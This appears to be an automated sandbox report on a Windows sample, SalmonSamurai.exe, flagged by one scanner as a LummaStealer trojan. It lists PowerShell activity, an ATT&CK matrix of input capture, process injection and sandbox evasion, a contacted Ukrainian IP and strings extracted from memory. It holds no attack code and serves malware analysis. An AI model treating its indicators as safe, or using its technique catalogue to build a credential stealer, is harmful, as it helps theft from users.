Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 12 Process Injection | 1 Masquerading | 11 Input Capture | 21 Security Software Discovery | Remote Services | 11 Input Capture | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Search Order Hijacking | 12 Process Injection | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Search Order Hijacking | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 32 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |

[Behavior graph: ID 1579955; Sample: SalmonSamurai.exe; Startdate: 23/12/2024; Architecture: WINDOWS; Score: 45. Signatures shown: Multi AV Scanner detection for submitted file; AI detected suspicious sample; Drops large PE files; Loading BitLocker PowerShell Module. Network nodes: 89.187.28.253, 49862, 80 (UA-WICOMWiMAXUkraineAutonomousSystemUA, Ukraine); chrome.cloudflare-dns.com 172.64.41.3, 443, 49748, 49749 (CLOUDFLARENETUS, United States); 192.168.2.5 (unknown).]


| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| SalmonSamurai.exe | 30% | ReversingLabs | Win32.Trojan.LummaStealer | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\NsisExtracted\ffmpeg.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dll | 0% | ReversingLabs | | |

No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://crbug.com/dawn/1276 | 0% | Avira URL Cloud | safe | |
| https://crbug.com/dawn/537 | 0% | Avira URL Cloud | safe | |
| https://bugs.chromium.org/p/dawn/issues/detail?id=434timestamp-querySupport | 0% | Avira URL Cloud | safe | |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
                                                                                                                  high
                                                                                                                  https://uk.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.neti.ee/cgi-bin/otsing?query=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                      high
                                                                                                                      https://petalsearch.com/search?query=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                        high
                                                                                                                        https://bugs.chromium.org/p/dawn/issues/detail?id=434timestamp-querySupportSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                          high
                                                                                                                          https://bugs.chromium.org/p/dawn/issues/detail?id=690SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                            high
                                                                                                                            https://qc.search.yahoo.com/favicon.icohttps://qc.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                              high
                                                                                                                              https://dns.google/dns-querySalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                high
                                                                                                                                https://ph.search.yahoo.com/favicon.icohttps://ph.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://oceanhero.today/web?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://crbug.com/newCheckIfAudioThreadIsAliveMedia.AudioThreadStatusCreatingSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://ch.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/CloudflareSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://crbug.com/dawn/582SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://crbug.com/dawn/1083SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://crbug.com/dawn/343SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://crbug.com/dawn/342SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://imgs.sapo.pt/images/sapo.icohttp://pesquisa.sapo.pt/?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://nl.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://in.search.yahoo.com/favicon.icohttps://in.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://search.goo.ne.jp/cdn/common/img/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://crbug.com/tint/1003SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://ak.apnstatic.com/media/images/favicon_search-results.icohttp://dts.search-results.com/sr?lng=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.sogou.com/images/logo/old/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://in.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://search.imesh.net/favicon.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://pe.search.yahoo.com/favicon.icohttps://pe.search.yahoo.com/searchSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://crbug.com/dawn/792SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://arianna.libero.it/search/abin/integrata.cgi?query=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://odvr.nic.cz/dohSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://crbug.com/dawn/673SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://imgs.sapo.pt/images/sapo.icoSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://search.privacywall.org/suggest.php?q=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://de.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://ar.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.quad9.net/home/privacy/SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.yandex.ua/chrome/newtabSalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                          high
